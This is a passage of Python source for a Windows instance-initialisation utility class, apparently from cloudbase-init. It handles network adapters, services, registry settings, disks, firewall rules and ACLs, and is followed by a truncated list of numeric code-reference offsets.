args = [netsh_path, "interface", "ipv4", "set", "subinterface",
str(iface_index), "mtu=%s" % mtu,
"store=persistent"]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Setting MTU for interface "%(name)s" with '
'value "%(mtu)s" failed' % {'name': name, 'mtu': mtu})
def rename_network_adapter(self, old_name, new_name):
base_dir = self._get_system_dir()
netsh_path = os.path.join(base_dir, 'netsh.exe')
args = [netsh_path, "interface", "set", "interface",
'name=%s' % old_name, 'newname=%s' % new_name]
(out, err, ret_val) = self.execute_process(args, shell=False)
if ret_val:
raise exception.CloudbaseInitException(
'Renaming interface "%(old_name)s" to "%(new_name)s" '
'failed' % {'old_name': old_name, 'new_name': new_name})
@staticmethod
def _get_network_adapter(name):
conn = wmi.WMI(moniker='//./root/cimv2')
query = conn.Win32_NetworkAdapter(NetConnectionID=name)
if not len(query):
raise exception.CloudbaseInitException(
"Network adapter not found: %s" % name)
return query[0]
@staticmethod
def _set_static_network_config_legacy(name, address, netmask, gateway,
dnsnameservers):
if netaddr.valid_ipv6(address):
LOG.warning("Setting IPv6 info not available on this system")
return
adapter_config = WindowsUtils._get_network_adapter(name).associators(
wmi_result_class='Win32_NetworkAdapterConfiguration')[0]
LOG.debug("Setting static IP address")
(ret_val,) = adapter_config.EnableStatic([address], [netmask])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set static IP address on network adapter: %d" %
ret_val)
reboot_required = (ret_val == 1)
if gateway:
LOG.debug("Setting static gateways")
(ret_val,) = adapter_config.SetGateways([gateway], [1])
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set gateway on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
if dnsnameservers:
LOG.debug("Setting static DNS servers")
(ret_val,) = adapter_config.SetDNSServerSearchOrder(dnsnameservers)
if ret_val > 1:
raise exception.CloudbaseInitException(
"Cannot set DNS on network adapter: %d" % ret_val)
reboot_required = reboot_required or ret_val == 1
return reboot_required
@staticmethod
def _fix_network_adapter_dhcp(interface_name, enable_dhcp, address_family):
interface_id = WindowsUtils._get_network_adapter(interface_name).GUID
tcpip_key = "Tcpip6" if address_family == AF_INET6 else "Tcpip"
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\services\\%(tcpip_key)s\\"
"Parameters\\Interfaces\\%(interface_id)s" %
{"tcpip_key": tcpip_key, "interface_id": interface_id},
0, winreg.KEY_SET_VALUE) as key:
winreg.SetValueEx(
key, 'EnableDHCP', 0, winreg.REG_DWORD,
1 if enable_dhcp else 0)
@staticmethod
def _set_interface_dns(interface_name, dnsnameservers):
# Import here to avoid loading errors on Windows versions where MI is
# not available
import mi
conn = wmi.WMI(moniker='//./root/standardcimv2')
# Requires Windows >= 6.2
dns_client = conn.MSFT_DnsClientServerAddress(
InterfaceAlias=interface_name)
if not len(dns_client):
raise exception.ItemNotFoundException(
'Network interface with name "%s" not found' %
interface_name)
dns_client = dns_client[0]
custom_options = [{
u'name': u'ServerAddresses',
u'value_type': mi.MI_ARRAY | mi.MI_STRING,
u'value': dnsnameservers
}]
operation_options = {u'custom_options': custom_options}
dns_client.put(operation_options=operation_options)
def enable_network_adapter(self, name, enabled):
adapter = self._get_network_adapter(name)
if enabled:
adapter.Enable()
else:
adapter.Disable()
@staticmethod
def _set_static_network_config(name, address, prefix_len, gateway):
if netaddr.valid_ipv6(address):
family = AF_INET6
else:
family = AF_INET
# This is needed to avoid the error:
# "Inconsistent parameters PolicyStore PersistentStore and
# Dhcp Enabled"
WindowsUtils._fix_network_adapter_dhcp(name, False, family)
conn = wmi.WMI(moniker='//./root/standardcimv2')
existing_addresses = conn.MSFT_NetIPAddress(
AddressFamily=family, InterfaceAlias=name)
for existing_address in existing_addresses:
LOG.debug(
"Removing existing IP address \"%(ip)s\" "
"from adapter \"%(name)s\"",
{"ip": existing_address.IPAddress, "name": name})
existing_address.Delete_()
existing_routes = conn.MSFT_NetRoute(
AddressFamily=family, InterfaceAlias=name)
for existing_route in existing_routes:
LOG.debug(
"Removing existing route \"%(route)s\" "
"from adapter \"%(name)s\"",
{"route": existing_route.DestinationPrefix, "name": name})
existing_route.Delete_()
conn.MSFT_NetIPAddress.create(
AddressFamily=family, InterfaceAlias=name, IPAddress=address,
PrefixLength=prefix_len, DefaultGateway=gateway)
def set_static_network_config(self, name, address, prefix_len_or_netmask,
gateway, dnsnameservers):
ip_network = netaddr.IPNetwork(
u"%s/%s" % (address, prefix_len_or_netmask))
prefix_len = ip_network.prefixlen
netmask = str(ip_network.netmask)
if self.check_os_version(6, 2):
self._set_static_network_config(
name, address, prefix_len, gateway)
if len(dnsnameservers):
self._set_interface_dns(name, dnsnameservers)
else:
return self._set_static_network_config_legacy(
name, address, netmask, gateway, dnsnameservers)
def _get_network_team_manager(self):
if self._network_team_manager:
return self._network_team_manager
team_managers = [
"cloudbaseinit.utils.windows.netlbfo.NetLBFOTeamManager",
]
cl = classloader.ClassLoader()
for class_name in team_managers:
try:
cls = cl.load_class(class_name)
if cls.is_available():
self._network_team_manager = cls()
return self._network_team_manager
except Exception as ex:
LOG.exception(ex)
raise exception.ItemNotFoundException(
"No network team manager available")
def create_network_team(self, team_name, mode, load_balancing_algorithm,
members, mac_address, primary_nic_name=None,
primary_nic_vlan_id=None, lacp_timer=None):
self._get_network_team_manager().create_team(
team_name, mode, load_balancing_algorithm, members, mac_address,
primary_nic_name, primary_nic_vlan_id, lacp_timer)
def add_network_team_nic(self, team_name, nic_name, vlan_id):
self._get_network_team_manager().add_team_nic(
team_name, nic_name, vlan_id)
def _get_config_key_name(self, section):
key_name = self._config_key
if section:
key_name += section.replace('/', '\\') + '\\'
return key_name
def set_config_value(self, name, value, section=None):
key_name = self._get_config_key_name(section)
with winreg.CreateKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
if type(value) == int:
regtype = winreg.REG_DWORD
else:
regtype = winreg.REG_SZ
winreg.SetValueEx(key, name, 0, regtype, value)
def get_config_value(self, name, section=None):
key_name = self._get_config_key_name(section)
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
key_name) as key:
(value, regtype) = winreg.QueryValueEx(key, name)
return value
except WindowsError:
return None
def wait_for_boot_completion(self):
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
"SYSTEM\\Setup\\Status\\SysprepStatus", 0,
winreg.KEY_READ) as key:
while True:
gen_state = winreg.QueryValueEx(key,
"GeneralizationState")[0]
if gen_state == 7:
break
time.sleep(1)
LOG.info('Waiting for sysprep completion. '
'GeneralizationState: %d', gen_state)
except WindowsError as ex:
if ex.winerror == 2:
LOG.debug('Sysprep data not found in the registry, '
'skipping sysprep completion check.')
else:
raise ex
def check_service_exists(self, service_name):
LOG.debug("Checking if service exists: %s", service_name)
try:
with self._get_service_handle(service_name):
return True
except pywintypes.error as ex:
if ex.winerror == winerror.ERROR_SERVICE_DOES_NOT_EXIST:
return False
raise
def get_service_status(self, service_name):
LOG.debug("Getting service status for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_STATUS) as hs:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
return self._SERVICE_STATUS_MAP.get(
state, WindowsUtils.SERVICE_STATUS_UNKNOWN)
def get_service_start_mode(self, service_name):
LOG.debug("Getting service start mode for: %s", service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_QUERY_CONFIG) as hs:
service_config = win32service.QueryServiceConfig(hs)
start_type = service_config[1]
return [k for k, v in self._SERVICE_START_TYPE_MAP.items()
if v == start_type][0]
def set_service_start_mode(self, service_name, start_mode):
# TODO(alexpilotti): Handle the "Delayed Start" case
LOG.debug("Setting service start mode for: %s", service_name)
start_type = self._get_win32_start_type(start_mode)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs, win32service.SERVICE_NO_CHANGE,
start_type, win32service.SERVICE_NO_CHANGE,
None, None, False, None, None, None, None)
def start_service(self, service_name):
LOG.debug('Starting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_START) as hs:
win32service.StartService(hs, service_name)
def stop_service(self, service_name, wait=False):
LOG.debug('Stopping service %s', service_name)
with self._get_service_handle(
service_name,
win32service.SERVICE_STOP |
win32service.SERVICE_QUERY_STATUS) as hs:
win32service.ControlService(hs, win32service.SERVICE_CONTROL_STOP)
if wait:
while True:
service_status = win32service.QueryServiceStatusEx(hs)
state = service_status['CurrentState']
if state == win32service.SERVICE_STOPPED:
return
time.sleep(.1)
@staticmethod
@contextlib.contextmanager
def _get_service_control_manager(
scm_access=win32service.SC_MANAGER_CONNECT):
hscm = win32service.OpenSCManager(None, None, scm_access)
try:
yield hscm
finally:
win32service.CloseServiceHandle(hscm)
@staticmethod
@contextlib.contextmanager
def _get_service_handle(service_name,
service_access=win32service.SERVICE_QUERY_CONFIG,
scm_access=win32service.SC_MANAGER_CONNECT):
with WindowsUtils._get_service_control_manager(scm_access) as hscm:
hs = win32service.OpenService(hscm, service_name, service_access)
try:
yield hs
finally:
win32service.CloseServiceHandle(hs)
@staticmethod
def _get_win32_start_type(start_mode):
start_type = WindowsUtils._SERVICE_START_TYPE_MAP.get(start_mode)
if not start_type:
raise exception.InvalidStateException(
"Invalid service start mode: %s" % start_mode)
return start_type
def create_service(self, service_name, display_name, path, start_mode,
username=None, password=None):
LOG.debug('Creating service %s', service_name)
start_type = self._get_win32_start_type(start_mode)
with WindowsUtils._get_service_control_manager(
scm_access=win32service.SC_MANAGER_CREATE_SERVICE) as hscm:
hs = win32service.CreateService(
hscm, service_name, display_name,
win32service.SERVICE_ALL_ACCESS,
win32service.SERVICE_WIN32_OWN_PROCESS,
start_type,
win32service.SERVICE_ERROR_NORMAL,
path, None, False, None,
username, password)
win32service.CloseServiceHandle(hs)
def delete_service(self, service_name):
LOG.debug('Deleting service %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_ALL_ACCESS) as hs:
win32service.DeleteService(hs)
def set_service_credentials(self, service_name, username, password):
LOG.debug('Setting service credentials: %s', service_name)
with self._get_service_handle(
service_name, win32service.SERVICE_CHANGE_CONFIG) as hs:
win32service.ChangeServiceConfig(
hs,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
win32service.SERVICE_NO_CHANGE,
None,
None,
False,
None,
username,
password,
None)
def get_service_username(self, service_name):
LOG.debug('Getting service username: %s', service_name)
with self._get_service_handle(service_name) as hs:
cfg = win32service.QueryServiceConfig(hs)
return cfg[7]
def reset_service_password(self):
"""This is needed to avoid pass the hash attacks."""
if not self.check_service_exists(self._service_name):
LOG.info("Service does not exist: %s", self._service_name)
return None
service_username = self.get_service_username(self._service_name)
# Ignore builtin accounts
if "\\" not in service_username:
LOG.info("Skipping password reset, service running as a built-in "
"account: %s", service_username)
return None
domain, username = service_username.split('\\')
if domain != ".":
LOG.info("Skipping password reset, service running as a domain "
"account: %s", service_username)
return None
LOG.debug('Resetting password for service user: %s', service_username)
maximum_length = self.get_maximum_password_length()
password = self.generate_random_password(maximum_length)
self.set_user_password(username, password)
self.set_service_credentials(
self._service_name, service_username, password)
return domain, username, password
def terminate(self):
# Wait for the service to start. Polling the service "Started" property
# is not enough
time.sleep(3)
self.stop_service(self._service_name)
def get_default_gateway(self):
default_routes = [r for r in self._get_ipv4_routing_table()
if r[0] == '0.0.0.0']
if default_routes:
return default_routes[0][3], default_routes[0][2]
else:
return None, None
@staticmethod
def _heap_alloc(heap, size):
table_mem = kernel32.HeapAlloc(heap, 0, ctypes.c_size_t(size.value))
if not table_mem:
raise exception.CloudbaseInitException(
'Unable to allocate memory for the IP forward table')
return table_mem
@contextlib.contextmanager
def _get_forward_table(self):
heap = kernel32.GetProcessHeap()
forward_table_size = ctypes.sizeof(Win32_MIB_IPFORWARDTABLE)
size = wintypes.ULONG(forward_table_size)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem, ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
try:
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err == self.ERROR_INSUFFICIENT_BUFFER:
kernel32.HeapFree(heap, 0, p_forward_table)
table_mem = self._heap_alloc(heap, size)
p_forward_table = ctypes.cast(
table_mem,
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE))
err = iphlpapi.GetIpForwardTable(p_forward_table,
ctypes.byref(size), 0)
if err and err != kernel32.ERROR_NO_DATA:
raise exception.CloudbaseInitException(
'Unable to get IP forward table. Error: %s' % err)
yield p_forward_table
finally:
kernel32.HeapFree(heap, 0, p_forward_table)
def _get_ipv4_routing_table(self):
routing_table = []
with self._get_forward_table() as p_forward_table:
forward_table = p_forward_table.contents
table = ctypes.cast(
ctypes.addressof(forward_table.table),
ctypes.POINTER(Win32_MIB_IPFORWARDROW *
forward_table.dwNumEntries)).contents
for row in table:
destination = Ws2_32.inet_ntoa(
row.dwForwardDest).decode()
netmask = Ws2_32.inet_ntoa(
row.dwForwardMask).decode()
gateway = Ws2_32.inet_ntoa(
row.dwForwardNextHop).decode()
routing_table.append((
destination,
netmask,
gateway,
row.dwForwardIfIndex,
row.dwForwardMetric1))
return routing_table
def check_static_route_exists(self, destination):
return len([r for r in self._get_ipv4_routing_table()
if r[0] == destination]) > 0
def add_static_route(self, destination, mask, next_hop, interface_index,
metric):
args = ['ROUTE', 'ADD', destination, 'MASK', mask, next_hop]
(out, err, ret_val) = self.execute_process(args)
# Cannot use the return value to determine the outcome
if ret_val or err:
raise exception.CloudbaseInitException(
'Unable to add route: %s' % err)
def get_os_version(self):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
ret_val = ntdll.RtlGetVersion(ctypes.byref(vi))
if ret_val:
raise exception.WindowsCloudbaseInitException(
"RtlGetVersion failed with error: %s" % ret_val)
return {"major_version": vi.dwMajorVersion,
"minor_version": vi.dwMinorVersion,
"build_number": vi.dwBuildNumber,
"platform_id": vi.dwPlatformId,
"csd_version": vi.szCSDVersion,
"service_pack_major": vi.wServicePackMajor,
"service_pack_minor": vi.wServicePackMinor,
"suite_mask": vi.wSuiteMask,
"product_type": vi.wProductType}
def is_client_os(self):
return self.get_os_version()["product_type"] == self.VER_NT_WORKSTATION
def check_os_version(self, major, minor, build=0):
vi = Win32_OSVERSIONINFOEX_W()
vi.dwOSVersionInfoSize = ctypes.sizeof(Win32_OSVERSIONINFOEX_W)
vi.dwMajorVersion = major
vi.dwMinorVersion = minor
vi.dwBuildNumber = build
mask = 0
for type_mask in [VER_MAJORVERSION, VER_MINORVERSION, VER_BUILDNUMBER]:
mask = kernel32.VerSetConditionMask(mask, type_mask,
VER_GREATER_EQUAL)
type_mask = VER_MAJORVERSION | VER_MINORVERSION | VER_BUILDNUMBER
ret_val = ntdll.RtlVerifyVersionInfo(ctypes.byref(vi), type_mask, mask)
if not ret_val:
return True
elif ret_val == self.STATUS_REVISION_MISMATCH:
return False
else:
raise exception.CloudbaseInitException(
"RtlVerifyVersionInfo failed with error: %s" % ret_val)
def get_volume_label(self, drive):
max_label_size = 261
label = ctypes.create_unicode_buffer(max_label_size)
ret_val = kernel32.GetVolumeInformationW(six.text_type(drive), label,
max_label_size, 0, 0, 0, 0, 0)
if ret_val:
return label.value
def get_volume_path_names_by_mount_point(self, mount_point):
max_volume_name_len = 50
volume_name = ctypes.create_unicode_buffer(max_volume_name_len)
if not kernel32.GetVolumeNameForVolumeMountPointW(
six.text_type(mount_point), volume_name,
max_volume_name_len):
if kernel32.GetLastError() in [self.ERROR_INVALID_NAME,
self.ERROR_PATH_NOT_FOUND]:
raise exception.ItemNotFoundException(
"Mount point not found: %s" % mount_point)
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get volume name for mount point: %s. "
"Error: %%r" % mount_point)
volume_path_names_len = wintypes.DWORD(100)
while True:
volume_path_names = ctypes.create_unicode_buffer(
volume_path_names_len.value)
if not kernel32.GetVolumePathNamesForVolumeNameW(
volume_name, volume_path_names, volume_path_names_len,
ctypes.byref(volume_path_names_len)):
if kernel32.GetLastError() == self.ERROR_MORE_DATA:
continue
else:
raise exception.WindowsCloudbaseInitException(
"Failed to get path names for volume name: %s."
"Error: %%r" % volume_name.value)
return [n for n in volume_path_names[
:volume_path_names_len.value - 1].split('\0') if n]
def generate_random_password(self, length):
if length < 3:
raise exception.CloudbaseInitException(
"Password can not have less than 3 characters!")
while True:
pwd = super(WindowsUtils, self).generate_random_password(length)
# Make sure that the Windows complexity requirements are met:
# http://technet.microsoft.com/en-us/library/cc786468(v=ws.10).aspx
valid = True
for r in ["[a-z]", "[A-Z]", "[0-9]"]:
if not re.search(r, pwd):
valid = False
if valid:
return pwd
def _split_str_buf_list(self, buf, buf_len):
i = 0
value = ''
values = []
while i < buf_len:
c = buf[i]
if c != '\x00':
value += c
else:
values.append(value)
value = ''
i += 1
return values
def get_logical_drives(self):
buf_size = self.MAX_PATH
buf = ctypes.create_unicode_buffer(buf_size + 1)
buf_len = kernel32.GetLogicalDriveStringsW(buf_size, buf)
if not buf_len:
raise exception.WindowsCloudbaseInitException(
"GetLogicalDriveStringsW failed: %r")
return self._split_str_buf_list(buf, buf_len)
def get_cdrom_drives(self):
drives = self.get_logical_drives()
return [d for d in drives if kernel32.GetDriveTypeW(d) ==
self.DRIVE_CDROM]
def _is_64bit_arch(self):
# interpreter's bits
return struct.calcsize("P") == 8
def get_physical_disks(self):
physical_disks = []
disk_guid = GUID_DEVINTERFACE_DISK
handle_disks = setupapi.SetupDiGetClassDevsW(
ctypes.byref(disk_guid), None, None,
self.DIGCF_PRESENT | self.DIGCF_DEVICEINTERFACE)
if handle_disks == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
"SetupDiGetClassDevs failed")
try:
did = Win32_SP_DEVICE_INTERFACE_DATA()
did.cbSize = ctypes.sizeof(Win32_SP_DEVICE_INTERFACE_DATA)
index = 0
while setupapi.SetupDiEnumDeviceInterfaces(
handle_disks, None, ctypes.byref(disk_guid), index,
ctypes.byref(did)):
index += 1
handle_disk = self.INVALID_HANDLE_VALUE
required_size = wintypes.DWORD()
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), None, 0,
ctypes.byref(required_size), None):
if (kernel32.GetLastError() !=
self.ERROR_INSUFFICIENT_BUFFER):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
pdidd = ctypes.cast(
msvcrt.malloc(ctypes.c_size_t(required_size.value)),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W))
try:
pdidd.contents.cbSize = ctypes.sizeof(
Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W)
if not self._is_64bit_arch():
# NOTE(cpoieana): For some reason, on x86 platforms
# the alignment or content of the struct
# is not taken into consideration.
pdidd.contents.cbSize = 6
if not setupapi.SetupDiGetDeviceInterfaceDetailW(
handle_disks, ctypes.byref(did), pdidd,
required_size, None, None):
raise exception.WindowsCloudbaseInitException(
"SetupDiGetDeviceInterfaceDetailW failed: %r")
device_path = ctypes.cast(
pdidd.contents.DevicePath, wintypes.LPWSTR).value
handle_disk = kernel32.CreateFileW(
device_path, 0, self.FILE_SHARE_READ,
None, self.OPEN_EXISTING, 0, 0)
if handle_disk == self.INVALID_HANDLE_VALUE:
raise exception.CloudbaseInitException(
'CreateFileW failed')
sdn = Win32_STORAGE_DEVICE_NUMBER()
b = wintypes.DWORD()
if not kernel32.DeviceIoControl(
handle_disk, self.IOCTL_STORAGE_GET_DEVICE_NUMBER,
None, 0, ctypes.byref(sdn), ctypes.sizeof(sdn),
ctypes.byref(b), None):
raise exception.WindowsCloudbaseInitException(
'DeviceIoControl failed: %r')
physical_disks.append(
r"\\.\PHYSICALDRIVE%d" % sdn.DeviceNumber)
finally:
msvcrt.free(pdidd)
if handle_disk != self.INVALID_HANDLE_VALUE:
kernel32.CloseHandle(handle_disk)
finally:
setupapi.SetupDiDestroyDeviceInfoList(handle_disks)
return physical_disks
def get_volumes(self):
"""Retrieve a list with all the volumes found on all disks."""
volumes = []
volume = ctypes.create_unicode_buffer(chr(0) * self.MAX_PATH)
handle_volumes = kernel32.FindFirstVolumeW(volume, self.MAX_PATH)
if handle_volumes == self.INVALID_HANDLE_VALUE:
raise exception.WindowsCloudbaseInitException(
"FindFirstVolumeW failed: %r")
try:
while True:
volumes.append(volume.value)
found = kernel32.FindNextVolumeW(handle_volumes, volume,
self.MAX_PATH)
if not found:
errno = ctypes.GetLastError()
if errno == self.ERROR_NO_MORE_FILES:
break
else:
raise exception.WindowsCloudbaseInitException(
"FindNextVolumeW failed: %r")
finally:
kernel32.FindVolumeClose(handle_volumes)
return volumes
def _get_fw_protocol(self, protocol):
if protocol == self.PROTOCOL_TCP:
fw_protocol = self._FW_IP_PROTOCOL_TCP
elif protocol == self.PROTOCOL_UDP:
fw_protocol = self._FW_IP_PROTOCOL_UDP
else:
raise NotImplementedError("Unsupported protocol")
return fw_protocol
def firewall_create_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_port = client.Dispatch("HNetCfg.FWOpenPort")
fw_port.Name = name
fw_port.Protocol = self._get_fw_protocol(protocol)
fw_port.Port = port
fw_port.Scope = self._FW_SCOPE_ALL
fw_port.Enabled = True
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_profile = fw_profile.GloballyOpenPorts.Add(fw_port)
def firewall_remove_rule(self, name, port, protocol, allow=True):
if not allow:
raise NotImplementedError()
fw_mgr = client.Dispatch("HNetCfg.FwMgr")
fw_profile = fw_mgr.LocalPolicy.CurrentProfile
fw_protocol = self._get_fw_protocol(protocol)
fw_profile = fw_profile.GloballyOpenPorts.Remove(port, fw_protocol)
def is_wow64(self):
return win32process.IsWow64Process()
def get_system32_dir(self):
return os.path.expandvars('%windir%\\system32')
def get_syswow64_dir(self):
return os.path.expandvars('%windir%\\syswow64')
def get_sysnative_dir(self):
return os.path.expandvars('%windir%\\sysnative')
def check_sysnative_dir_exists(self):
sysnative_dir_exists = os.path.isdir(self.get_sysnative_dir())
if not sysnative_dir_exists and self.is_wow64():
LOG.warning('Unable to validate sysnative folder presence. '
'If Target OS is Server 2003 x64, please ensure '
'you have KB942589 installed')
return sysnative_dir_exists
def _get_system_dir(self, sysnative=True):
"""Return Windows system directory with compatibility support.
Depending on the interpreter bits and platform architecture,
the return value may vary between
C:\Windows\(System32|SysWOW64|Sysnative).
Note that "Sysnative" is just an alias (doesn't really exist on disk).
More info about this can be found in documentation.
"""
if sysnative and self.check_sysnative_dir_exists():
return self.get_sysnative_dir()
if not sysnative and self._is_64bit_arch():
return self.get_syswow64_dir()
return self.get_system32_dir()
def is_nano_server(self):
return self._check_server_level("NanoServer")
def _check_server_level(self, server_level):
try:
with winreg.OpenKey(
winreg.HKEY_LOCAL_MACHINE,
"Software\\Microsoft\\Windows NT\\CurrentVersion\\Server\\"
"ServerLevels") as key:
return winreg.QueryValueEx(key, server_level)[0] == 1
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def execute_powershell_script(self, script_path, sysnative=True):
base_dir = self._get_system_dir(sysnative)
powershell_path = os.path.join(base_dir,
'WindowsPowerShell\\v1.0\\'
'powershell.exe')
args = [powershell_path]
if not self.is_nano_server():
args += ['-ExecutionPolicy', 'RemoteSigned', '-NonInteractive',
'-File']
args.append(script_path)
return self.execute_process(args, shell=False)
def execute_system32_process(self, args, shell=True, decode_output=False,
sysnative=True):
base_dir = self._get_system_dir(sysnative)
process_path = os.path.join(base_dir, args[0])
return self.execute_process([process_path] + args[1:],
decode_output=decode_output, shell=shell)
def get_maximum_password_length(self):
return 20
def set_timezone(self, timezone_name):
windows_name = windows_tz.tz_win.get(timezone_name)
if not windows_name:
raise exception.CloudbaseInitException(
"The given timezone name is unrecognised: %r" % timezone_name)
timezone.Timezone(windows_name).set(self)
def is_real_time_clock_utc(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation') as key:
try:
utc = winreg.QueryValueEx(key, 'RealTimeIsUniversal')[0]
return utc != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
raise
def set_real_time_clock_utc(self, utc):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'TimeZoneInformation',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'RealTimeIsUniversal', 0,
winreg.REG_DWORD, 1 if utc else 0)
def get_page_files(self):
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management') as key:
values = winreg.QueryValueEx(key, 'PagingFiles')[0]
page_files = []
for value in values:
v = value.split(" ")
path = v[0]
min_size_mb = int(v[1]) if len(v) > 1 else 0
max_size_mb = int(v[2]) if len(v) > 2 else 0
page_files.append((path, min_size_mb, max_size_mb))
return page_files
def set_page_files(self, page_files):
values = []
for path, min_size_mb, max_size_mb in page_files:
values.append("%s %d %d" % (path, min_size_mb, max_size_mb))
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
'SYSTEM\\CurrentControlSet\\Control\\'
'Session Manager\\Memory Management',
0, winreg.KEY_ALL_ACCESS) as key:
winreg.SetValueEx(key, 'PagingFiles', 0,
winreg.REG_MULTI_SZ, values)
def enable_trim(self, enable):
"""Enables or disables TRIM delete notifications."""
args = ["fsutil.exe", "behavior", "set", "disabledeletenotify",
"0" if enable else "1"]
(out, err, ret_val) = self.execute_system32_process(args)
if ret_val:
raise exception.CloudbaseInitException(
'TRIM configurating failed.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def set_path_admin_acls(self, path):
LOG.debug("Assigning admin ACLs on path: %s", path)
# Sets ACLs for "NT AUTHORITY\SYSTEM" and "BUILTIN\Administrators"
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"icacls.exe", path, "/inheritance:r", "/grant:r",
"*S-1-5-18:(OI)(CI)F", "*S-1-5-32-544:(OI)(CI)F"])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to set path ACLs.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def take_path_ownership(self, path, username=None):
if username:
raise NotImplementedError()
LOG.debug("Taking ownership of path: %s", path)
# TODO(alexpilotti): replace with SetNamedSecurityInfo
(out, err, ret_val) = self.execute_system32_process([
"takeown.exe", "/F", path])
if ret_val:
raise exception.CloudbaseInitException(
'Failed to take path ownership.\nOutput: %(out)s\nError:'
' %(err)s' % {'out': out, 'err': err})
def check_dotnet_is_installed(self, version):
# See: https://msdn.microsoft.com/en-us/library/hh925568(v=vs.110).aspx
if str(version) != "4":
raise exception.CloudbaseInitException(
"Only checking for version 4 is supported at the moment")
try:
with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, 'SOFTWARE\\'
'Microsoft\\NET Framework Setup\\NDP\\'
'v%s\\Full' % version) as key:
return winreg.QueryValueEx(key, 'Install')[0] != 0
except WindowsError as ex:
if ex.winerror == 2:
return False
else:
raise
def get_file_version(self, path):
info = win32api.GetFileVersionInfo(path, '\\')
ms = info['FileVersionMS']
ls = info['FileVersionLS']
return (win32api.HIWORD(ms), win32api.LOWORD(ms),
win32api.HIWORD(ls), win32api.LOWORD(ls))
def get_default_script_exec_header(self):
return constant.SCRIPT_HEADER_CMD
| [
[
[
623,
633
],
[
43658,
43668
],
[
43972,
43982
],
[
48664,
48674
]
],
[
[
641,
647
],
[
1633,
1639
],
[
1667,
1673
],
[
1701,
1707
],
[
1734,
1740
],
[
1767,
1773
],
[
1799,
1805
],
[
1831,
1837
],
[
1863,
1869
],
[
1890,
1896
],
[
1920,
1926
],
[
1968,
1974
],
[
2376,
2382
],
[
2499,
2505
],
[
3203,
3209
],
[
3365,
3371
],
[
3925,
3931
],
[
4096,
4102
],
[
4182,
4188
],
[
4277,
4283
],
[
4338,
4344
],
[
4534,
4540
],
[
5133,
5139
],
[
5326,
5332
],
[
5748,
5754
],
[
5807,
5813
],
[
5981,
5987
],
[
6100,
6106
],
[
6226,
6232
],
[
6397,
6403
],
[
6438,
6444
],
[
6479,
6485
],
[
6561,
6567
],
[
6692,
6698
],
[
7114,
7120
],
[
7980,
7986
],
[
8300,
8306
],
[
9067,
9073
],
[
9708,
9714
],
[
9754,
9760
],
[
9885,
9891
],
[
10040,
10046
],
[
10162,
10168
],
[
10519,
10525
],
[
10570,
10576
],
[
10760,
10766
],
[
10812,
10818
],
[
10893,
10899
],
[
20212,
20218
],
[
20242,
20248
],
[
20338,
20344
],
[
20403,
20409
],
[
20444,
20450
],
[
20706,
20712
],
[
20751,
20757
],
[
20790,
20796
],
[
21284,
21290
],
[
23111,
23117
],
[
23343,
23349
],
[
23482,
23488
],
[
23864,
23870
],
[
24012,
24018
],
[
25185,
25191
],
[
25337,
25343
],
[
25556,
25562
],
[
25584,
25590
],
[
26043,
26049
],
[
48456,
48462
],
[
48794,
48800
],
[
48960,
48966
],
[
48996,
49002
],
[
49159,
49165
],
[
49387,
49393
],
[
49451,
49457
],
[
49608,
49614
],
[
50120,
50126
],
[
50149,
50155
],
[
50204,
50210
],
[
51570,
51576
],
[
51647,
51653
],
[
52510,
52516
],
[
53001,
53007
],
[
53387,
53393
],
[
53762,
53768
],
[
54528,
54534
],
[
54760,
54766
],
[
56286,
56292
],
[
57037,
57043
